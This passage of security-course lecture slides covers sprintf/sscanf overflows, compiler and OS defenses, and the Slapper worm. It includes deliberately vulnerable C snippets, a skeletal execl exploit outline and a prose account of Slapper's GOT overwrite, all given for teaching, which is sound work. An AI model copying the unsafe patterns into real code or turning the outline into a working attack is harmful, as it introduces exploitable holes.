## Safe and Unsafe Coding: sprintf()
- Vulnerability:
```
int main(int argc, char *argv[]) {
char usage[1024]; /* Can this be overflowed? */
sprintf(usage, "USAGE: %s -f flag [arg1]\n", argv[0]);
// How long can a filename be, in argv[0]? What if the
// filename is not a legitimate name from the OS? See
// exploit below.
return 0;
}
```
## Safe and Unsafe Coding: sprintf()
- Exploit:
```
int main(int argc, char *argv[]) {
execl("/path/to/above/program",
[very long string here],
NULL);
// Starts program in 1st arg, passes 2nd arg
// as argv[0] to that program. Bad news!
return 0;
}
```
## Safe and Unsafe Coding: sprintf()
- Problem: `snprintf()` is not part of all C libraries
- Solutions:
- Package a working `snprintf()` with your software
- Use a width limit specifier in sprintf():
```
sprintf(usage, "USAGE: %.1000s -f flag [arg1]\n",
argv[0]);
```
- Unfortunately, the width limit specifier `%.1000s` is not standard across all libraries, either
## Safe and Unsafe Coding
- Unsafe:
```
void main(int argc, char *argv[]) {
char buf[256];
sscanf(argv[0], "%s", &buf); // Won't stop at 256 bytes
}
```
- Safe:
```
void main(int argc, char *argv[]) {
char buf[256];
sscanf(argv[0], "%255s", &buf); // Width limit specifier
}
```
## Safe and Unsafe Coding
- Each of the example applies to a family of library functions
- For example, `scanf()`, `sscanf()`, `fscanf()`, and `vfscanf()` all have the same coding vulnerabilities
- The safe style shown in our examples can be easily adapted to other members of the same family
</textarea></section>
</section>
<section>
<section data-markdown id="defenses"><textarea data-template>
# Defenses
</textarea></section>
<section data-markdown data-separator="^\n$"><textarea data-template>
## Compiler-Based Prevention
- One approach: Modify the C language itself with a new compiler and runtime library, as in the [Cyclone variant of C](http://www.research.att.com/projects/cyclone/)
- Overhead for bounds checking, garbage collection, library safeguards, etc., ranges from negligible to >100% for the worst cases
- Another approach: leave the language alone, but modify the compiler to emit stack and/or buffer overflow safeguards in the executable
- Examples we will see: StackGuard, ProPolice, and StackShield
## StackGuard: Stack Canaries
- StackGuard inserts a marker in between the frame pointer and the return address on the stack
- Marker is called a `canary`, as in the "canary in a coal mine"
- If a buffer overflow overwrites the stack all the way to the return address, it will also overwrite the canary
- Before returning, the canary is examined for modification
## Stack Canary Operation
<!-- .slide: class="max-image-height-300" -->
![canary stack](images/exploits/canary-stack.png)
- Overflowing `buffer[]` tramples on canary
- Does not prevent trashing the EBP, local function or file pointers, etc.
- Canary value: NUL-CR-LF-EOF; very difficult to write out from a string
## ProPolice: Better Stack Canaries and Frame Layout
- ProPolice (a.k.a. SSP, Stack-Smashing Protector) from IBM makes a couple of major improvements to StackGuard
- Canary is placed below the saved EBP to protect it
- The stack frame layout is rearranged so that non-array locals, such as function pointers and file pointers, are placed below arrays, so that overflowing the arrays cannot reach the pointers
## Stack Canary Limitations
- Stack canaries only guard against a *direct* attack on the stack, e.g. overwriting a portion of the stack directly from its neighboring addresses
- We saw that a format-string attack is *indirect*: it computes the location of the return address, then overwrites just that address and does not overflow from neighboring addresses
- Hence, it does not overwrite a canary
## StackShield: Protecting Return Addresses
- StackShield is a Linux/gcc add-on that modifies the ASM output from gcc to maintain a separate data segment with return addresses
- Removing the return addresses from the data stack prevents both direct and indirect data attacks on the return address
## StackShield: Protecting Return Addresses
- Also computes the range of valid code addresses and performs a range check on all function calls and returns
- A call to, or return into, a data area will be detected as invalid because of the address range
## Operating System Defenses
- Don't allow execution in the stack
- Exploit could still execute code from the heap or other global data area
- Instead of read and write permission bits on pages, add an execute permission bit and set it to false on all data pages (heap, stack, etc.)
- This is supported in hardware on the Intel x86-64 architecture and in the versions of Microsoft Windows (from XP onwward) that run on it
## Case Study: Slapper Worm
- The 2002 worm known as [Linux/Slapper](https://www.symantec.com/security_response/writeup.jsp?docid=2002-091311-5851-99) was a very complex attack on heap buffer overflow vulnerabilities within the Apache web server
- Vulnerability: In secure mode (i.e. on an https:// connection under SSL [Secure Socket Layer]), Apache copied the client's master key into a fixed-length buffer `key_arg[]` that was just big enough to hold a valid 8-byte key
- But didn't do any bounds checking, even though the key length is passed as a second parameter with the key
## Case Study: Slapper Worm
- Exploit: Pass in a long key and key length, such that a certain magic address is overwritten
## Slapper: The Magic Address
- The magic address that Slapper wanted to overwrite was the GOT (Global Offset Table) entry for the `free()` function
- GOT is the Unix/ELF equivalent of the IAT (Import Address Table) in a Windows PE file; Slapper is therefore an IAT modifying EPO worm
- I.e. If you redirect the GOT entry for free(), then calls into the C run-time library that should have gone into free() are now redirected to a new address
## Slapper: The Magic Address
- The relative distance from the key_arg[] buffer to the GOT entry for `free()` differs among Apache revisions and among different Linux revisions for which Apache was compiled
- The Slapper author computed the addresses and distances across 23 (!) different combinations of Apache revision/Linux system
## Slapper: The Magic Address
- The first client message the worm sends is a request for Apache to identify its revision number and the Linux system version code (a legitimate request, as Apache services can depend on these numbers)
- The exploit code was then tuned for the particular revision/system
- Ultimately, Slapper ran its own shellcode on the server system, with Apache privileges, when Apache executed a call to `free()`
- See Szor, 10.4.4, for lots more details
</textarea></section>
</section>
</div>
</div>
<script src="reveal.js/lib/js/head.min.js"></script>
<script src="reveal.js/js/reveal.js"></script>
<script src="settings.js"></script>
</body>
</html>